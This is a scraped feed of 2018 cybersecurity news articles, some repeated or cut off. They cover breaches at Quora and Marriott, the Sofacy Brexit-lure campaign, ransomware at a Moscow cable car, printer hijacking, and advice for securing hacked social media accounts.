Society’s dependence on internet-based technologies means security professionals must defend against cyberattacks as well as more traditional threats, such as robbers or disgruntled employees.

However, cybercriminals target some industries at disproportionally high rates. Here are four of them:

1. Health Care

Since health care professionals deal with life-or-death situations, cyberattacks could hinder both productivity and patient care to a tremendous degree. Some attacks shut down entire health systems comprising multiple facilities or forcing affected individuals to switch from computerized processes to using pens and paper.

The medical industry faces an exceptional risk for cyberattacks because there are so many players involved in the sector. More than 83 percent of organizations responding to a recent survey reported making new or improved organizational security enhancements.

That’s notable progress, but analysts also worry about the potential for attacks that don’t directly target hospitals or similar organizations. Recent demonstrations from cybersecurity researchers have shown how it’s possible to hack into medical devices like pacemakers or insulin pumps.

There are also instances of hospitals being unable to perform fundamental services. In November 2018, a ransomware attack forced two hospitals to send ambulances elsewhere and only accept walk-up patients to the emergency rooms.

Hackers know they can wreak substantial havoc by attacking hospitals, thereby increasing the potential for notoriety. It doesn’t hurt that those organizations keep medical records containing valuable information hackers could sell on the black market. One instance with North Carolina-based company Atrium Heath potentially breached the data of 2.65 million people.

2. Nonprofit

Nonprofits typically focus their efforts on causes that improve society at large, at-risk groups and others in need. However, cyberattacks could thwart all those intentions to put energy toward the greater good. Research indicates cyberattacks threaten nonprofit organizations for various reasons.

Data from 2017 found only 27 percent of nonprofits broke even that year. So, if nonprofit leaders want to devote more money to cybersecurity, they may feel too financially strapped to make meaningful progress. Plus, many nonprofits have small teams of hired employees and rely heavily on volunteers otherwise. That bare-bones staffing structure could make it harder than average for nonprofits to recover after issues happen.

Also, nonprofits may feel overwhelmed about where to start as they learn about cybersecurity. Fortunately, some products geared toward nonprofits have robust integrated security. Volgistics is a company associated with volunteer management that serves 5,121 organizations. A section on its website details the online and offline measures taken to keep customer data safe.

3. Retail

The retail industry is cyclical, so certain times of the year — including the holiday season or when kids go back to school — are particularly busy. Plus, cybercrime problems could take websites offline or cause reputational damage. Despite those risks, retailers make blunders when budgeting for cybersecurity. A recent report found 50 percent of all data breaches in the U.S. happened at retail establishments.

The study also determined that entities spend the most money on cybersecurity measures considered among the least effective. No matter what, it’s crucial for the retail sector to take cybersecurity seriously. Research from Gemalto found 70 percent of people would stop doing business with companies that suffer data breaches. So, failing to conquer the problem could lead to profit losses in unexpected ways.

4. Financial Services

People rely on banks to do daily transactions for business or personal reasons. And, since financial institutions have extraordinary amounts of money on hand, it’s not surprising they’re prime targets for cybercriminals. Even financial industry businesses that don’t store so many financial resources on site — such as wealth management companies — keep documents filled with clients’ personal details.

The financial sector is also so potentially lucrative for hackers that they may set their sights on carrying out attacks on ATMs in multiple countries. Sources report a North Korean hacking group known as Lazarus is believed to be behind attacks in 23 countries totaling tens of millions of dollars.

There’s an emerging trend of banks hiring ethical hackers to find vulnerabilities and test existing safeguards. That’s a practical way to address cybercrime risks, but it’s an approach that’ll likely become increasingly harder to choose. That’s because there’s already a gigantic cybersecurity skills gap consisting of hundreds of thousands of open cybersecurity positions, and forecasts say the shortage will get worse.

cyberattacks

No Industry Is Immune

Any sector that uses the internet to conduct business could become a cybercriminal’s target.

Although the industries mentioned here need to take particular care to prevent issues, proactive steps taken to fix problems and monitor for suspicious issues could keep all companies safer from cybercrime.

About the author

Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com. To learn more about Kayla and her re

Pierluigi Paganini

(Security Affairs – Cybersecurity, cyberattacks)

The post 4 Industries That Have to Fight the Hardest Against Cyberattacks appeared first on Security Affairs.



Security Affairs

4 Industries That Have to Fight the Hardest Against Cyberattacks

Society’s dependence on internet-based technologies means security professionals must defend against cyberattacks as well as more traditional threats, such as robbers or disgruntled employees.

However, cybercriminals target some industries at disproportionally high rates. Here are four of them:

1. Health Care

Since health care professionals deal with life-or-death situations, cyberattacks could hinder both productivity and patient care to a tremendous degree. Some attacks shut down entire health systems comprising multiple facilities or forcing affected individuals to switch from computerized processes to using pens and paper.

The medical industry faces an exceptional risk for cyberattacks because there are so many players involved in the sector. More than 83 percent of organizations responding to a recent survey reported making new or improved organizational security enhancements.

That’s notable progress, but analysts also worry about the potential for attacks that don’t directly target hospitals or similar organizations. Recent demonstrations from cybersecurity researchers have shown how it’s possible to hack into medical devices like pacemakers or insulin pumps.

There are also instances of hospitals being unable to perform fundamental services. In November 2018, a ransomware attack forced two hospitals to send ambulances elsewhere and only accept walk-up patients to the emergency rooms.

Hackers know they can wreak substantial havoc by attacking hospitals, thereby increasing the potential for notoriety. It doesn’t hurt that those organizations keep medical records containing valuable information hackers could sell on the black market. One instance with North Carolina-based company Atrium Heath potentially breached the data of 2.65 million people.

2. Nonprofit

Nonprofits typically focus their efforts on causes that improve society at large, at-risk groups and others in need. However, cyberattacks could thwart all those intentions to put energy toward the greater good. Research indicates cyberattacks threaten nonprofit organizations for various reasons.

Data from 2017 found only 27 percent of nonprofits broke even that year. So, if nonprofit leaders want to devote more money to cybersecurity, they may feel too financially strapped to make meaningful progress. Plus, many nonprofits have small teams of hired employees and rely heavily on volunteers otherwise. That bare-bones staffing structure could make it harder than average for nonprofits to recover after issues happen.

Also, nonprofits may feel overwhelmed about where to start as they learn about cybersecurity. Fortunately, some products geared toward nonprofits have robust integrated security. Volgistics is a company associated with volunteer management that serves 5,121 organizations. A section on its website details the online and offline measures taken to keep customer data safe.

3. Retail

The retail industry is cyclical, so certain times of the year — including the holiday season or when kids go back to school — are particularly busy. Plus, cybercrime problems could take websites offline or cause reputational damage. Despite those risks, retailers make blunders when budgeting for cybersecurity. A recent report found 50 percent of all data breaches in the U.S. happened at retail establishments.

The study also determined that entities spend the most money on cybersecurity measures considered among the least effective. No matter what, it’s crucial for the retail sector to take cybersecurity seriously. Research from Gemalto found 70 percent of people would stop doing business with companies that suffer data breaches. So, failing to conquer the problem could lead to profit losses in unexpected ways.

4. Financial Services

People rely on banks to do daily transactions for business or personal reasons. And, since financial institutions have extraordinary amounts of money on hand, it’s not surprising they’re prime targets for cybercriminals. Even financial industry businesses that don’t store so many financial resources on site — such as wealth management companies — keep documents filled with clients’ personal details.

The financial sector is also so potentially lucrative for hackers that they may set their sights on carrying out attacks on ATMs in multiple countries. Sources report a North Korean hacking group known as Lazarus is believed to be behind attacks in 23 countries totaling tens of millions of dollars.

There’s an emerging trend of banks hiring ethical hackers to find vulnerabilities and test existing safeguards. That’s a practical way to address cybercrime risks, but it’s an approach that’ll likely become increasingly harder to choose. That’s because there’s already a gigantic cybersecurity skills gap consisting of hundreds of thousands of open cybersecurity positions, and forecasts say the shortage will get worse.

cyberattacks

No Industry Is Immune

Any sector that uses the internet to conduct business could become a cybercriminal’s target.

Although the industries mentioned here need to take particular care to prevent issues, proactive steps taken to fix problems and monitor for suspicious issues could keep all companies safer from cybercrime.

About the author

Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com. To learn more about Kayla and her re

Pierluigi Paganini

(Security Affairs – Cybersecurity, cyberattacks)

The post 4 Industries That Have to Fight the Hardest Against Cyberattacks appeared first on Security Affairs.

Hacked Without a Trace: The Threat of Fileless Malware

Malware. The word alone makes us all cringe as we instantly relate it to something malicious happening on our computers or devices. Gone are the days when we thought the

The post Hacked Without a Trace: The Threat of Fileless Malware appeared first on The Cyber Security Place.

Quora data breach: hackers obtained information on roughly 100 million users

Another day another illustrious victim of the data breach, the popular question-and-answer website Quora suffered a major data breach that exposed 100 million users.

On Monday, the popular question-and-answer website Quora suffered a major data breach, unknown hackers breached its systems and accessed 100 million user data.

The company is notifying the incident to the affected users and reset their passwords as a precautionary measure, it also reported it to law enforcement. Quora hired a forensics and security firm to assist in the investigation.

Quora is still investigating the security breach, it discovered the intrusion on  November 30 and attributed it to a “malicious third party.”

“We recently discovered that some user data was compromised as a result of unauthorized access to one of our systems by a malicious third party. We are working rapidly to investigate the situation further and take the appropriate steps to prevent such incidents in the future.” reads the data breach notification.

“On Friday we discovered that some user data was compromised by a third party who gained unauthorized access to one of our systems.”

Exposed data includes name, email address, hashed password, data imported from linked networks, public content and actions (e.g. questions, answers, comments, and upvotes), and non-public content and actions (e.g. answer requests, downvotes, and direct messages).

“While the passwords were encrypted (hashed with a salt that varies for each user), it is generally a best practice not to reuse the same password across multiple services, and we recommend that people change their passwords if they are doing so.” continues the company.

quora data breach

Data belonging to users who posted anonymously was not exposed, financial data and social security numbers are at risk because the Quora platform doesn’t use it.

Quora has identified the root cause of the breach and has taken steps to address it, it did not disclose technical details on the incident.

The company announced additional efforts to mitigate the effects of the incident and to avoid future security breaches.

“Not all Quora users are affected, and some were impacted more than others.” states the FAQ page published by the company.

Pierluigi Paganini

(Security Affairs – Quora, Data breach)

The post Quora data breach: hackers obtained information on roughly 100 million users appeared first on Security Affairs.

Russia-linked APT Sofacy leverages BREXIT lures in recent attacks

Russia-linked cyber-espionage group Sofacy, (aka APT28Pawn StormFancy BearSednitTsar Team, and Strontium) use BREXIT lures in recent attacks.

Sofacy Brexit

The APT group used Brexit-themed bait documents on the same day the UK Prime Minister Theresa May announced the initial BREXIT draft agreement with the European Union (EU).

“As the United Kingdom (UK) Prime Minister Theresa May announced the initial BREXIT draft agreement with the European Union (EU), iDefense analysts identified a new campaign by SNAKEMACKEREL using a BREXIT-themed lure document to deliver the Zekapab (also known as Zebrocy) first-stage malware” reads a report published by Accenture.

The Sofacy APT group has been active since at least 2007 and it has targeted governments, militaries, and security organizations worldwide. The group was involved also in the string of attacks that targeted 2016 Presidential election.

In September 2018, security experts from ESET spotted the first UEFI rootkit of ever, the code tracked as LoJax was used in attacks in the wild.

In November 2018, malware researchers at the Cybaze ZLab- Yoroi team discovered a new variant of the dangerous APT28 Lojax rootkit.

According to Accenture’s iDefense experts, on November 15 Sofacy attackers were using weaponized documents to deliver the Zebrocy backdoor.

Threat actors used the BREXIT-themed lure documents to load malicious content from an external source using the settings.xml.rels component embedded within the DOCX file.

The macro component downloaded from the external source includes a function called AutoClose(), as well as two payloads embedded via Base64, encoded strings.

Analyzing an IP address (109.248.148.42) involved in the attack, the experts discovered two different .dotm components, attachedTemplate.dotm and templates.dotm.

Both components contain the same VBA macro code, each containing two different embedded payloads: one is an executable binary file and the other is a .docm file.

“Analysis into the two binaries shows that they are in fact a Delphi (initially UPX
packed) and .NET version of the Zekapab first-stage malware.” continues the report.

The malware collects system information and a list of running processes and sends the data to the command and control (C&C) server that in turn deliver the next stage malware is the system is deemed interesting.

Further information on the attack, including mitigation, are reported in the analysis published by Accenture

Pierluigi Paganini

(Security Affairs – Sofacy, Brexit)

The post Russia-linked APT Sofacy leverages BREXIT lures in recent attacks appeared first on Security Affairs.

Security Affairs: Russia-linked APT Sofacy leverages BREXIT lures in recent attacks

Russia-linked cyber-espionage group Sofacy, (aka APT28Pawn StormFancy BearSednitTsar Team, and Strontium) use BREXIT lures in recent attacks.

Sofacy Brexit

The APT group used Brexit-themed bait documents on the same day the UK Prime Minister Theresa May announced the initial BREXIT draft agreement with the European Union (EU).

“As the United Kingdom (UK) Prime Minister Theresa May announced the initial BREXIT draft agreement with the European Union (EU), iDefense analysts identified a new campaign by SNAKEMACKEREL using a BREXIT-themed lure document to deliver the Zekapab (also known as Zebrocy) first-stage malware” reads a report published by Accenture.

The Sofacy APT group has been active since at least 2007 and it has targeted governments, militaries, and security organizations worldwide. The group was involved also in the string of attacks that targeted 2016 Presidential election.

In September 2018, security experts from ESET spotted the first UEFI rootkit of ever, the code tracked as LoJax was used in attacks in the wild.

In November 2018, malware researchers at the Cybaze ZLab- Yoroi team discovered a new variant of the dangerous APT28 Lojax rootkit.

According to Accenture’s iDefense experts, on November 15 Sofacy attackers were using weaponized documents to deliver the Zebrocy backdoor.

Threat actors used the BREXIT-themed lure documents to load malicious content from an external source using the settings.xml.rels component embedded within the DOCX file.

The macro component downloaded from the external source includes a function called AutoClose(), as well as two payloads embedded via Base64, encoded strings.

Analyzing an IP address (109.248.148.42) involved in the attack, the experts discovered two different .dotm components, attachedTemplate.dotm and templates.dotm.

Both components contain the same VBA macro code, each containing two different embedded payloads: one is an executable binary file and the other is a .docm file.

“Analysis into the two binaries shows that they are in fact a Delphi (initially UPX
packed) and .NET version of the Zekapab first-stage malware.” continues the report.

The malware collects system information and a list of running processes and sends the data to the command and control (C&C) server that in turn deliver the next stage malware is the system is deemed interesting.

Further information on the attack, including mitigation, are reported in the analysis published by Accenture

Pierluigi Paganini

(Security Affairs – Sofacy, Brexit)

The post Russia-linked APT Sofacy leverages BREXIT lures in recent attacks appeared first on Security Affairs.



Security Affairs

Malware since 2017: Auction giant Sotheby’s Home hit by Magecart attack

By Waqas

Sotheby’s, an American multinational corporation and Auction House has become another victim of Magecart attack after hackers gained access to Sotheby’s home website and inserted a card-skimming code aiming at customers’ credit card and banking data. Although Sotheby’s detected the intrusion on 10th October 2018 the malware was present on its website and stealing personal and financial data of […]

This is a post from HackRead.com Read the original post: Malware since 2017: Auction giant Sotheby’s Home hit by Magecart attack

What To Do When Your Social Media Account Gets Hacked

You log in to your favorite social media site and notice a string of posts or messages definitely not posted by you. Or, you get a message that your account password has been changed, without your knowledge. It hits you that your account has been hacked. What do you do?

This is a timely question considering that social media breaches have been on the rise. A recent survey revealed that 22%of internet users said that their online accounts have been hacked at least once, while 14% reported they were hacked more than once. And, earlier this year Facebook itself got hacked, exposing the identity information of 50 million users.

Your first move—and a crucial one—is to change your password right away, and notify your connections that your account has been hacked. This way your friends know not to click on any suspicious posts or messages that appear to be coming from you because they might contain malware or phishing attempts. But that’s not all. There may be other, hidden threats to having your social media account hacked.

The risks associated with a hacker poking around your social media have a lot to do with how much personal information you share. Does your account include personal information that could be used to steal your identity, or guess your security questions on other accounts?

These could include your date of birth, address, hometown, or names of family members and pets. Just remember, even if you keep your profile locked down with strong privacy settings, once the hacker logs in as you, everything you have posted is up for grabs.

You should also consider whether the password for the compromised account is being used on any of your other accounts, because if so, you should change those as well. A clever hacker could easily try your email address and known password on a variety of sites to see if they can log in as you, including on banking sites.

Next, you have to address the fact that your account could have been used to spread scams or malware. Hackers often infect accounts so they can profit off clicks using adware, or steal even more valuable information from you and your contacts.

You may have already seen the scam for “discount Ray-Ban” sunglasses that plagued Facebook a couple of years ago, and recently took over Instagram. This piece of malware posts phony ads to the infected user’s account, and then tags their friends in the post. Because the posts appear in a trusted friend’s feed, users are often tricked into clicking on it, which in turn compromises their own account.

So, in addition to warning your contacts not to click on suspicious messages that may have been sent using your account, you should flag the messages as scams to the social media site, and delete them from your profile page.

Finally, you’ll want to check to see if there are any new apps or games installed to your account that you didn’t download. If so, delete them since they may be another attempt to compromise your account.

Now that you know what do to after a social media account is hacked, here’s how to prevent it from happening in the first place.

How To Keep Your Social Accounts Secure

  • Don’t click on suspicious messages or links, even if they appear to be posted by someone you know.
  • Flag any scam posts or messages you encounter on social media to the website, so they can help stop the threat from spreading.
  • Use unique, complicated passwords for all your accounts.
  • If the site offers multi-factor authentication, use it, and choose the highest privacy setting available.
  • Avoid posting any identity information or personal details that might allow a hacker to guess your security questions.
  • Don’t log in to your social accounts while using public Wi-Fi, since these networks are often unsecured and your information could be stolen.
  • Always use comprehensive security software that can keep you protected from the latest threats.
  • Keep up-to-date on the latest scams and malware threats

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

The post What To Do When Your Social Media Account Gets Hacked appeared first on McAfee Blogs.

Experts found data belonging to 82 Million US Users exposed on unprotected Elasticsearch Instances

Security experts at HackenProof are warning Open Elasticsearch instances expose over 82 million users in the United States.

Experts from HackenProof discovered Open Elasticsearch instances that expose over 82 million users in the United States.

Elasticsearch is a Java-based search engine based on the free and open-source information retrieval software library Lucene. It is developed in Java and is released as open source, it is used by many organizations worldwide.

Experts discovered 73 gigabytes of data during a regular security audit of publicly available servers. Using the Shodan search engine the experts discovered three IPs associated with misconfigured Elasticsearch clusters.

“A massive 73 GB data breach was discovered during a regular security audit of publicly available servers with the Shodan search engine.” reads a blog post published by HackenProof.

“Prior to this publication, there were at least 3 IPs with the identical Elasticsearch clusters misconfigured for public access.”

The first IP discovered by the experts on November 14, contained the personal information of 56,934,021 U.S. citizens (i.e. name, email, address, state, zip, phone number, IP address, and also employers and job title).

Experts discovered a second Index of the same archive that contained more than 25 million records with more detailed information (i.e. name, company details, zip address, carrier route, latitude/longitude, census tract, phone number, web address, email, employees count, revenue numbers, NAICS codes, SIC codes, and etc).

Elasticsearch instances data leak

Overall, HackenProof says (PDF), 82,851,841 people were impacted by this data breach.

The overall number of records exposed in the unprotected Elasticsearch instances is over 114,686,118 (114,686,118), according to HackenProof 2,851,841 individuals were impacted by this data leak.

At the time it is not clear which is the ownership of the exposed Elasticsearch instances, experts speculate that Data & Leads Inc. could be the data source.

Experts attempted to notify the incident to the company, but they did not receive any reply. The company website was taken offline just after the publication of the report.

It is not possible to determine for how long data remained exposed online, the good news is that the huge trove of data is no longer available.

“While the source of the leak was not immediately identifiable, the structure of the field ‘source’ in data fields is similar to those used by a data management company Data & Leads Inc. However, we weren’t able to get in touch with their representatives.” continues the blog post.

“Moreover, shortly before this publication Data & Leads website went offline and now is unavailable.”

In September, security experts from the firm Kromtech have discovered 4,000 compromised instances of open source analytics and search tool Elasticsearch that were running PoS malware.

Earlier 2017, the number of internet-accessible Elasticsearch installs was roughly 35,000.

In July, the security researcher Vinny Troia discovered that Exactis, a data broker based in Palm Coast, Florida, had exposed a database that contained close to 340 million individual records on a publicly accessible server.

Unprotected Elasticsearch instances are a gift for hackers and cybercriminals, hackers can compromise them by installing a malware and gain full administrative privileges on the underlying servers.

Pierluigi Paganini

(Security Affairs – Elasticsearch installs, hacking)

 

The post Experts found data belonging to 82 Million US Users exposed on unprotected Elasticsearch Instances appeared first on Security Affairs.

Security Affairs: New Zealand Security Bureau halts Spark from using Huawei 5G equipment

New Zealand intelligence agency asked mobile company Spark to avoid using Huawei equipment for 5G infrastructure.

According to New Zealand’s Government Communications Security Bureau, Huawei equipment for 5G infrastructure poses a “significant network security risk,” for this reason, it asked mobile company Spark to avoid using the equipment of the Chinese company.

The announcement follows the decision of the Australian Government to ban Huawei equipment from Australia’s 5G network due to security concerns.

New Zealand is a member of the FiveEyes intelligence alliance, the remaining countries (UK, US, Australia), except Canada, banned Huawei over security fears.

The Chinese company has been founded by a former People’s Liberation Army official in 1987. The US was the first country that warned of the security risks associated with the usage of the products manufactured by the Chinese telecommunications giant.

The Chinese firm denies having shared Australian customer data with the Chinese intelligence, but it is not enough for the Australian Government.

Australian authorities also banned the Chinese firm ZTE Corp.

Huawei was already helping Spark to build 5G mobile networks.

“In New Zealand, Huawei has previously helped build mobile networks. In March, Spark and Huawei showcased a 5G test site across the street from the Parliament, in a publicity move that was attended by then Broadcasting Minister Clare Curran.” reported the Associated Press.

China and New Zealand have a good commercial partnership and the ban imposed by the government could have severe repercussions on it. In 2008, New Zealand signed a free-trade deal with China.

“The economic and trade cooperation between China and New Zealand is mutually beneficial in nature,” said Foreign Ministry spokesman Geng Shuang.

“We hope New Zealand will provide a level-playing field for Chinese enterprises’ operation there and do something conducive for mutual trust and cooperation.”

Which is the Spark’s opinion on the ban?

The company is disappointed with the decision by New Zealand’s Government Communications Security Bureau, it is doing all the best to launch the 5G network by July 2020.

“Spark said it had wanted to use Huawei 5G equipment in its planned Radio Access Network, which involves technology associated with cell tower infrastructure.” concludes the AP.

“The company said it has not yet had time to review the detailed reasoning behind the spy agency’s decision, or whether it will take further steps.”

Pierluigi Paganini

(Security Affairs – New Zealand, Huawei)

The post New Zealand Security Bureau halts Spark from using Huawei 5G equipment appeared first on Security Affairs.



Security Affairs

New Zealand Security Bureau halts Spark from using Huawei 5G equipment

New Zealand intelligence agency asked mobile company Spark to avoid using Huawei equipment for 5G infrastructure.

According to New Zealand’s Government Communications Security Bureau, Huawei equipment for 5G infrastructure poses a “significant network security risk,” for this reason, it asked mobile company Spark to avoid using the equipment of the Chinese company.

The announcement follows the decision of the Australian Government to ban Huawei equipment from Australia’s 5G network due to security concerns.

New Zealand is a member of the FiveEyes intelligence alliance, the remaining countries (UK, US, Australia), except Canada, banned Huawei over security fears.

The Chinese company has been founded by a former People’s Liberation Army official in 1987. The US was the first country that warned of the security risks associated with the usage of the products manufactured by the Chinese telecommunications giant.

The Chinese firm denies having shared Australian customer data with the Chinese intelligence, but it is not enough for the Australian Government.

Australian authorities also banned the Chinese firm ZTE Corp.

Huawei was already helping Spark to build 5G mobile networks.

“In New Zealand, Huawei has previously helped build mobile networks. In March, Spark and Huawei showcased a 5G test site across the street from the Parliament, in a publicity move that was attended by then Broadcasting Minister Clare Curran.” reported the Associated Press.

China and New Zealand have a good commercial partnership and the ban imposed by the government could have severe repercussions on it. In 2008, New Zealand signed a free-trade deal with China.

“The economic and trade cooperation between China and New Zealand is mutually beneficial in nature,” said Foreign Ministry spokesman Geng Shuang.

“We hope New Zealand will provide a level-playing field for Chinese enterprises’ operation there and do something conducive for mutual trust and cooperation.”

Which is the Spark’s opinion on the ban?

The company is disappointed with the decision by New Zealand’s Government Communications Security Bureau, it is doing all the best to launch the 5G network by July 2020.

“Spark said it had wanted to use Huawei 5G equipment in its planned Radio Access Network, which involves technology associated with cell tower infrastructure.” concludes the AP.

“The company said it has not yet had time to review the detailed reasoning behind the spy agency’s decision, or whether it will take further steps.”

Pierluigi Paganini

(Security Affairs – New Zealand, Huawei)

The post New Zealand Security Bureau halts Spark from using Huawei 5G equipment appeared first on Security Affairs.

Hacker hijacks printers worldwide to promote popular YouTube channel

The TheHackerGiraffe used the Printer Exploitation Toolkit (PRET) to hijack +50k vulnerable printers to Promote PewDiePie YouTube Channel.

An anonymous hacker hijacked over 50,000 internet-connected printers worldwide to print out messages promoting the subscription to the PewDiePie YouTube channel. Felix Arvid Ulf Kjellberg, aka PewDiePie, is a popular Swedish Youtuber, comedian, and video game commentator, formerly best known for his Let’s Play commentaries and now mostly known for his comedy and vlogs.

This is the last act of disputed for the “most-subscribed Youtube channel” crown between T-Series and PewDiePie.

The PewDiePie has more than 73 million YouTube subscribers.

Now a hacker with the Twitter account TheHackerGiraffe decided to promote his favourite YouTube channel in his way, he hacked tens of thousands of printers exposed online.

hacked printers

The hacker scanned the Internet for printers with port 9100 open using Shodan and hacked them publishing a message that invited the victims to unsubscribe from T-Series channel and subscribe to PewDiePie instead.

“PewDiePie is in trouble, and he needs your help to defeat T-Series!”

“PewDiePie, the currently most subscribed to channel on YouTube, is at stake of losing his position as the number one position by an Indian company called T-Series that simply uploads videos of Bollywood trailers and campaigns,”

The TheHackerGiraffe used the Printer Exploitation Toolkit (PRET) to compromise vulnerable printers. The PRET is a legitimate developed by researchers from Ruhr-Universität Bochum in Germany for testing purposes.

The case is very singular and raises the discussion about the importance of properly secure Internet-connected devices.
In this case, attackers simply printed out a message but vulnerable printers exposed online could be the entry points for attackers that with further lateral movements can compromise an entire network and access sensitive information.
printers hijacking

Don’t forget that every device in your organization that is exposed online enlarges your attack surface.

Pierluigi Paganini

(Security Affairs – vulnerable printers, hacking)

The post Hacker hijacks printers worldwide to promote popular YouTube channel appeared first on Security Affairs.

Security Affairs: Moscow’s New Cable Car closed due to a ransomware infection

Two days after Moscow opened a new cable car system hackers infected its computer systems with ransomware.

The cable car system is long over 700 meters and spans across the Moscow river linking the Luzhniki Olympic Complex to the observation platform on Sparrow Hills.

Two days after Moscow cable car was opened, the servers of the Moscow Ropeway (MKD), the organization that operates the infrastructure was infected with the ransomware and attackers requested the payment in Bitcoin.

The infection occurred on Wednesday, November 28, at around 14:00, local time, according to local news outlets,

“One day after opening to the general public, Moscow’s highly touted first-ever cable car was forced to shut down after a reported cyberattack.” reported The Moscow Times.

“However, a cyberattack forced all passengers to disembark the cable car only two hours after it opened, its operator said on Wednesday.”

A video on the Rossiiskaya Gazeta government daily’s website showed a police officer explaining people waiting in line that the cable car would not reopen “for technical reasons.”

On November 29, experts at MDK removed the malware from its systems and on November 30 the Cable car was resumed.

“Since November 30, 2018, the Moscow Ropeway (MKD) has been operating normally.

On November 29, 2018, the MKD officers diagnosed all the systems that ensure the safe operation of the cableway as part of test activities for the launch of the road.” states the announcement on the MKD website.

Russian police have identified the hacker who carried out the ransomware attack, a criminal case was launched into the hacker attack on the Moscow cable car server.

“The Nikulinsky inter-district prosecutor’s office recognized as lawful and justified the initiation of criminal proceedings by the investigative bodies of the Moscow police under Part 1 of Article 273 of the Criminal Code of the Russian Federation (” Creation, use and distribution of malicious computer programs “) into the cyber attack on the Moscow cableway server,” said the metropolitan prosecutor’s office Lyudmila Nefedova.

In November 2016, another public transport system was infected with ransomware,

This is not the first time that public transportation has been affected by ransomware. In November 2016, hackers crashed the computer system of the San Francisco’s Municipal railway, took offline the ticket kiosks offline and gave riders a free ride for an entire day.

Pierluigi Paganini

(Security Affairs – ransomware, Moscow cable car)

The post Moscow’s New Cable Car closed due to a ransomware infection appeared first on Security Affairs.



Security Affairs

Moscow’s New Cable Car closed due to a ransomware infection

Two days after Moscow opened a new cable car system hackers infected its computer systems with ransomware.

The cable car system is long over 700 meters and spans across the Moscow river linking the Luzhniki Olympic Complex to the observation platform on Sparrow Hills.

Two days after Moscow cable car was opened, the servers of the Moscow Ropeway (MKD), the organization that operates the infrastructure was infected with the ransomware and attackers requested the payment in Bitcoin.

The infection occurred on Wednesday, November 28, at around 14:00, local time, according to local news outlets,

“One day after opening to the general public, Moscow’s highly touted first-ever cable car was forced to shut down after a reported cyberattack.” reported The Moscow Times.

“However, a cyberattack forced all passengers to disembark the cable car only two hours after it opened, its operator said on Wednesday.”

A video on the Rossiiskaya Gazeta government daily’s website showed a police officer explaining people waiting in line that the cable car would not reopen “for technical reasons.”

On November 29, experts at MDK removed the malware from its systems and on November 30 the Cable car was resumed.

“Since November 30, 2018, the Moscow Ropeway (MKD) has been operating normally.

On November 29, 2018, the MKD officers diagnosed all the systems that ensure the safe operation of the cableway as part of test activities for the launch of the road.” states the announcement on the MKD website.

Russian police have identified the hacker who carried out the ransomware attack, a criminal case was launched into the hacker attack on the Moscow cable car server.

“The Nikulinsky inter-district prosecutor’s office recognized as lawful and justified the initiation of criminal proceedings by the investigative bodies of the Moscow police under Part 1 of Article 273 of the Criminal Code of the Russian Federation (” Creation, use and distribution of malicious computer programs “) into the cyber attack on the Moscow cableway server,” said the metropolitan prosecutor’s office Lyudmila Nefedova.

In November 2016, another public transport system was infected with ransomware,

This is not the first time that public transportation has been affected by ransomware. In November 2016, hackers crashed the computer system of the San Francisco’s Municipal railway, took offline the ticket kiosks offline and gave riders a free ride for an entire day.

Pierluigi Paganini

(Security Affairs – ransomware, Moscow cable car)

The post Moscow’s New Cable Car closed due to a ransomware infection appeared first on Security Affairs.

Hackers Could Exploit A Zoom App Vulnerability To Disrupt Conferences

The customers of Zoom conferencing app need to update their apps at the earliest to protect themselves from hackers. As

Hackers Could Exploit A Zoom App Vulnerability To Disrupt Conferences on Latest Hacking News.

Security Affairs: Security Affairs newsletter Round 191 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online with a special deal

20% discount

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

·      Very trivial Spotify phishing campaign uncovered by experts
·      Experts found a new powerful modular Linux cryptominer
·      Hacker stole $1m from Silicon Valley executive via SIM swap
·      Linux Kernel is affected by two DoS vulnerabilities still unpatched
·      Ransomware attack disrupted emergency rooms at Ohio Hospital System
·      When Do You Need to Report a Data Breach?
·      Experts demonstrate how to exfiltrate data using smart bulbs
·      Malicious developer distributed tainted version of Event-Stream NodeJS Module to steal Bitcoins
·      The SLoad Powershell malspam is expanding to Italy
·      UK Parliament seized confidential Facebook docs to investigate its data protection policies.
·      British MP: Facebook was aware about Russian activity at least since 2014
·      FBI along with security firms dismantled 3ve Ad Fraud Operation
·      Initial patch for Webex Meetings flaw WebExec was incomplete. Cisco fixed it again
·      Uber fined nearly $1.2 Million by Dutch and UK Data Protection Authorities over data breach
·      AccuDoc Data Breach impacted 2.6 Million Atrium Health patients
·      Dell data breach – Dell forces password reset after the incident
·      Dissecting the Mindscrew-Powershell Obfuscation
·      Knock-Knock Docker!! Will you let me in? Open API Abuse in Docker Containers
·      U.S. DoJ charges Iranian duo over SamSam Ransomware activity
·      327 million Marriott guests affected in Starwood Data Breach
·      New PowerShell-based Backdoor points to MuddyWater
·      ETERNALSILENCE – 270K+ devices vulnerable to UPnProxy Botnet build using NSA hacking tools
·      MITRE evaluates Enterprise security products using the ATT&CK Framework

 

Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 191 – News of the week appeared first on Security Affairs.



Security Affairs

Security Affairs newsletter Round 191 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online with a special deal

20% discount

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

·      Very trivial Spotify phishing campaign uncovered by experts
·      Experts found a new powerful modular Linux cryptominer
·      Hacker stole $1m from Silicon Valley executive via SIM swap
·      Linux Kernel is affected by two DoS vulnerabilities still unpatched
·      Ransomware attack disrupted emergency rooms at Ohio Hospital System
·      When Do You Need to Report a Data Breach?
·      Experts demonstrate how to exfiltrate data using smart bulbs
·      Malicious developer distributed tainted version of Event-Stream NodeJS Module to steal Bitcoins
·      The SLoad Powershell malspam is expanding to Italy
·      UK Parliament seized confidential Facebook docs to investigate its data protection policies.
·      British MP: Facebook was aware about Russian activity at least since 2014
·      FBI along with security firms dismantled 3ve Ad Fraud Operation
·      Initial patch for Webex Meetings flaw WebExec was incomplete. Cisco fixed it again
·      Uber fined nearly $1.2 Million by Dutch and UK Data Protection Authorities over data breach
·      AccuDoc Data Breach impacted 2.6 Million Atrium Health patients
·      Dell data breach – Dell forces password reset after the incident
